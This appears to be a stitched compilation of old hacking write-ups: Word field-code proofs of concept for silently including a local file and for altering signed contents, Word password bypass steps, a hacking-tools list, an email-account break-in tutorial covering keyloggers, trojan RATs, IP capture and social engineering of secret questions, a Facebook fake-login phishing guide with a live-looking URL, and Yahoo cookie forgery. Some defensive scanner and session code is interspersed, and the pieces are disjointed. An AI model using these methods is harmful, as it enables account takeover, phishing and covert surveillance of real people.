does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).


Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:\a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask google how to do it by hand).


{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }



Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.


2) Oblivious signing



Attack Basics: Hacker and Victim want to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the signed contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker
and she gets away without paying Victim the $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.


Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.


{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }


Update: this flaw has been fixed in Office 2003 onwards,
but it still works in Office 2000 and even sometimes in 2002/03.
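A sketch of the scanner suggested under Countermeasures, which also covers the IF/FILENAME trick from the second proof of concept; it is an added example, not code from the original write-up. It assumes the document is available in the .docx (WordprocessingML) format rather than the Word 2000 binary format discussed above, and all function names are hypothetical.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % NS

# Field keywords the two attacks above rely on, and why each deserves a look.
FLAGGED = {
    "INCLUDETEXT": "imports another file's contents when the field is updated",
    "FILENAME": "displayed result depends on the file name, not on signed content",
    "DATE": "displayed result depends on the current date, not on signed content",
}


def _keyword(code):
    """First word of a field code, e.g. ' IF ... ' -> 'IF'."""
    parts = code.split()
    return parts[0].upper() if parts else ""


def fields_in_part(xml_bytes):
    """Yield (keyword, code, enclosing_keywords) for each field in one XML part."""
    stack = []  # open complex fields, innermost last
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag == W + "fldSimple":
            code = el.get(W + "instr", "")
            yield _keyword(code), code, [_keyword("".join(f["code"])) for f in stack]
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append({"code": [], "in_result": False})
            elif kind == "separate" and stack:
                stack[-1]["in_result"] = True
            elif kind == "end" and stack:
                code = "".join(stack.pop()["code"])
                yield _keyword(code), code, [_keyword("".join(f["code"])) for f in stack]
        elif el.tag == W + "instrText" and stack and not stack[-1]["in_result"]:
            stack[-1]["code"].append(el.text or "")  # code may be split over runs


def scan_docx(data):
    """Return a finding for every flagged field in any word/*.xml part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in sorted(archive.namelist()):
            # Headers, footers and footnotes are separate parts; the first
            # proof of concept above hides its field in a footer.
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            for keyword, code, enclosing in fields_in_part(archive.read(name)):
                if keyword in FLAGGED:
                    findings.append({"part": name, "keyword": keyword,
                                     "code": code.strip(), "inside": enclosing,
                                     "why": FLAGGED[keyword]})
    return findings


def _fld(kind):
    return '<w:r><w:fldChar w:fldCharType="%s"/></w:r>' % kind


def _code(text):
    return '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % text


def _text(text):
    return "<w:r><w:t>%s</w:t></w:r>" % text


def build_sample():
    """Constructed test input: only the parts the scanner reads, not a full .docx."""
    body = (_text("Hacker will pay Victim $100.")
            + '<w:fldSimple w:instr=" PAGE ">' + _text("1") + "</w:fldSimple>"
            + _fld("begin") + _code(" IF ")
            + _fld("begin") + _code(" FILENAME ") + _fld("separate")
            + _text("a.doc") + _fld("end")
            + _code(' = "a.doc" "Hello" "Bye" ') + _fld("separate")
            + _text("Hello") + _fld("end"))
    footer = (_fld("begin") + _code(" IF ")
              + _fld("begin") + _code(' INCLUDETEXT "c:\\\\a.txt" ') + _fld("end")
              + _code(' = "" "" ') + _fld("separate") + _fld("end"))
    parts = {
        "word/document.xml": '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p>'
                             '</w:body></w:document>' % (NS, body),
        "word/footer1.xml": '<w:ftr xmlns:w="%s"><w:p>%s</w:p></w:ftr>' % (NS, footer),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, xml in parts.items():
            archive.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample()):
        print("%(part)s: %(keyword)s inside %(inside)s - %(why)s" % f)
```

The "inside" list is the useful part for review: a flagged field nested in an IF is exactly the arrangement both proofs of concept use to keep the field out of sight.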


__________________________________________________________________________

We can consistently crash Word 2000 using the following method:


1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar

This consistently crashes Word 2000 with the following error
message:

DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".





Vulnerability: remove office passwords

Vulnerable: MS Word (Win2K/XP)



Example 1

1) Open MS Word with a new/blank page

2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc

3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...



Example 2

1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)

2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)

3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)

4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password





Change password if ya like & or save in whatever format if ya like ...

Top Hacking Tools

Top 10 Linux Tools

1. nmap - Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap - Amap is a next-generation tool for assisting network penetration testing. It performs fast and reliable application protocol detection, independent of the TCP/UDP port they are being bound to.

4. Ethereal - Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra - Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.

6. Metasploit Framework - The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper - John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus - Nessus is the world's most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world's largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS - Internetwork Routing Protocol Attack Suite - Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack - RainbowCrack is a general purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker tries all possible plaintexts one by one at cracking time. It is time consuming to break complex passwords in this way. The idea of the time-memory trade-off is to do all the cracking-time computation in advance and store the results in files, the so-called "rainbow tables".


Top 10 Windows Tools

1. Cain & Abel - Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan - SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner - GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina - Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade - SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth - N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds - Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles - The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com...OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) - Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

How to Break Into Email Accounts

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

Introduction



I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when pursuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...


Things You Should Know



As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.


If You Have Physical Access



I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....


www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171




Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...



If You Don't Have Physical Access




Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks? Well, then you definitely have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

Hacking Facebook Using Fake Login

Hack Facebook With Fake Login? Why Not ...
Do not forget sediain Hosting / Free Hosting for scripts that would put us create a fake login later location. Do not sampe forget, because it is most obligatory thing done!

Okay go, make sure too easy. Note Both ² And Do The Right Lesson According Below. Do not Sampe There slightest mistake! Here is his review:

1. First, create a file used in hosting where you want to make a fake login with filetype: html. Then give name: "index.html", so that the sample Web URL is: http://www.hostingloedisini.com/facebook/index.html

Make Code Match With Script Examples Below:

Scriptcode at no 1:

2. Create a file in hostingan lo logs.php itself, the example below http://www.hostingloedisini.com/facebook/logs.php script.

Scriptcode on no 2:

3. Create an empty file reply txt format with the name: logs.txt - so the URL was: http://www.hostingloedisini.com/facebook/logs.txt

4. This is mandatory and should be remembered! Do not forget to change modes all the files, so the permissions to: 777 (chmod + 777). Chmod 777 means that where all files can be read (r), can be written (w), and can execute (x). So chmod 777 is to change the file so the file can be executed by the User, Groups & Other. The results set the file permissions are 777 (rwxrwxrwx) for Unix Server. For permissions problem also depends on the hosting provider, create a pake hosting nyediain not change mode, immediately without notice tested ajah this point & pray it goes to work .. Hehe ..

5. Then spread the URL that has loe created, eg: "http://www.hostingloedisini.com/facebook/" with fellow users difacebook, advertisements, or spam email as much. Can also be sulky to cewe cewe / cowo cowo who likes to click loe tu login. Guaranteed mantaf can if get the username + login! : D

6. To view the login username and password, please open the file in his logs.txt, nah klo ada email username and password. you have logged

Examples of application testing their website here:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html

Good try, good luck ..

And for the Facebook fans, oh yes, here are some tips from me as well on being careful not to fall for a fake login:

1) Check that the website address in the link is correct. Example: for FB the link is http://www.facebook.com

2) Never open a strange link or strange code (CSS, XHTML, XML, or HTML). If you click it, you may end up giving away your account username and password.

3) Use a virtual keyboard, which is easy to obtain.
With the Windows XP look, simply click 'start' -> All Programs -> Accessories -> Accessibility -> 'On-Screen Keyboard'
Without the Windows XP look, simply click 'start' -> Program Files -> Accessories -> Accessibility -> 'On-Screen Keyboard'

4) When using a public Internet cafe (warnet), do not tick the "Remember me" check box when logging in, because it can save the username and password on the computer. The exception is when you use a personal computer.

5) If you are suddenly asked to log in again, be careful, because the page may be a fake login page designed on purpose.

Yahoo Session Cookie Generator



A posting on milw0rm.com by gammarays is very interesting in my opinion. In his proof-of-concept video he is seen generating an authentication cookie to get into Yahoo as any username. How did he do it?

I have read his paper and discussed it with him via email. Because the issue is highly critical, he did not disclose some important details. I agree with that, because I also have a Yahoo account and of course I do not want others to read my email :D

Yahoo Authentication

Yahoo implements single sign-on authentication, so a user only needs to log in once. When the login succeeds, the user gets a kind of free pass to all the services in the Yahoo network. This free pass takes the form of cookies. Only a user who holds the right cookies is allowed in; without the right cookies, you are kicked back to the login page.

The Yahoo cookies used for authentication are Y and T. Only these two cookies are needed to access all Yahoo services, including email and messenger. The normal Yahoo authentication scheme is shown in the figure below:

Red arrows indicate access without a cookie, while blue arrows indicate access with cookies. In the example above I use the mail service. The login server at Yahoo is login.yahoo.com, the only one accessed over https. When a user accesses a service without cookies, the user is redirected to the login server; if the login succeeds, the user is given cookies and redirected back to the service originally requested.

Gammarays' paper shows that a user can generate the cookies himself, so he no longer needs to log in at login.yahoo.com. That means he does not need to know someone's password to read their email. The flow looks like the following figure:


In the flow above, the user does not need to access login.yahoo.com because he can make his own valid cookies for entry into mail.yahoo.com. This means he can access any account without knowing the password. Let's dissect the contents of the Y and T cookies.

Y Cookies

The Y cookie is static: every time a user successfully logs in to Yahoo, he gets the same Y cookie value. The Y cookie consists of several fields:

* v: version, always filled with a value of 1.
* n: random value generated when the user creates an account or changes the password.
* l: username, encoded with a simple substitution technique. Mapping of "abcdefghijklmnopqrstuvwxyz0123456789._@-+" to "0123456789abcdefghijklmnopqrstuvwxyz._-+". For example, the username rizkiwicaksono becomes h8pa8m820aiede.
* r: registration week. The account registration time relative to June 30, 1996 - 6:00 pm, in weeks.

Of all these fields, the confidential ones are n and r. Without knowing the correct values of n and r, one cannot make a Y cookie. To get the values of n and r, one can access the Yahoo database (which requires hacking a Yahoo server) as Gammarays did, or steal someone else's cookie and take the values of n and r from it. Yahoo only uses https at login time; after that the services are not accessed via https, so the cookies are easy to sniff.

T Cookies

The T cookie is not static, because it contains a timestamp field and an IP address. This cookie also contains a signature that protects the integrity of the other fields. With this signature, if any other field is changed, the signature is no longer valid.

The fields in the T cookie are:

* a: age, with value YAE or QAE. Indicates whether this user can access content for readers aged 18 years and over.
* d: data consisting of several subfields: a, sl, g, ok, zz, tip.
* sk: signature version 3.
* ks: signature version 4.

The subfields of field d are:

* a: age, YAE or QAE.
* g: globally unique identifier. When you log in to Yahoo and view your profile, you are redirected to the address: profiles.yahoo.com/u/ .
* ok: verified email, usually contains -ZW0.
* sl: sled ID retrieved from the user database (fixed in nature; changing the password will not change sl).
* zz: timestamp, used to check whether the cookie has expired.
* tip: tcookie ip address, the user's IP address.

Of all the fields in the T cookie, the secret one is sl. The global identifier can be found using the Yahoo Query Language console. Example: select * from yahoo.identity where yid = 'spullara' returns 7C7SIF3MMHEOH3MJ5HYPYQQVQI.

The zz field is taken from the current time and tip from the IP address. Once all the fields are known, the values of a, sl, g, ok, zz and tip are concatenated into field d. Then fields l, n and d are used as input to produce the signature stored in field sk. The ks field is then generated from l, n, d and sk. The script to generate sk and ks is in the Gammarays paper. However, for security reasons the script is not complete and therefore cannot be run.

Of all the fields needed, the secret ones are n, r and sl. The rest are not confidential. The confidential fields n, r and sl are also easy to steal, because they are sent in cookies that are not encrypted and so are vulnerable to sniffing. Once the cookies have been stolen, the victim's n, r and sl values can be extracted with ease. If that happens, the attacker can generate the Y and T cookies himself to access the victim's account.

The authentication token at Yahoo is not a random session id but a collection of encoded fields with a signature. Herein lies the fault: Yahoo implements security through obscurity in its session token. Once the encoding and signature algorithms are known and the fields n, r and sl are obtained, the attacker can easily create his own session cookies. This is different from using a random session id in a cookie.

A stolen random session id is valid only for the session lifetime. Stolen n, r and sl last forever (until the victim changes the password).

A random session id does not rely on the confidentiality of algorithms or data, but on a random number that is very difficult to predict. A good session id must be unique (used one time only) and extremely hard to guess. This forces the attacker to brute-force guess the session id. Even if he manages to steal a session id, it is only valid as long as the session is; after that it is useless. Unlike a session id leak, a leak of the fields n, r and sl in Yahoo cookies lasts a long time, until the user changes the password. Even after the user has logged off from Yahoo, an attacker who has the fields n, r and sl can get back in by generating the Y and T cookies.
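The contrast drawn above, between a random session id and a token that can be rebuilt from long-lived account fields, shown as an added example that is not from the original post or the Gammarays paper. `derived_token` is a hypothetical stand-in (an HMAC over constructed data), not Yahoo's cookie algorithm; `SessionStore` and all other names are assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed sample data: a long-lived per-account value, standing in for
# fields that only change when the password changes.
ACCOUNT_SECRETS = {"alice": b"static-until-password-change"}


def derived_token(user, account_secret):
    """Weak design (hypothetical): the token is a pure function of static fields."""
    return hmac.new(account_secret, user.encode(), hashlib.sha256).hexdigest()


def derived_token_valid(user, token):
    expected = derived_token(user, ACCOUNT_SECRETS[user])
    return hmac.compare_digest(expected, token)  # no server state, so no logout


class SessionStore:
    """Server-side sessions keyed by an unpredictable random id."""

    def __init__(self, lifetime_seconds=1800):
        self.lifetime = lifetime_seconds
        self._sessions = {}  # session id -> (user, expiry time)

    def login(self, user, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = (user, now + self.lifetime)
        return sid

    def lookup(self, sid, now=None):
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, expires = entry
        if now >= expires:
            del self._sessions[sid]  # expired ids are purged, never revived
            return None
        return user

    def logout(self, sid):
        self._sessions.pop(sid, None)  # revocation kills any stolen copy too
```

With the random id, logout and expiry end the session for every holder of the id; the derived token stays valid for as long as the underlying account fields stay the same.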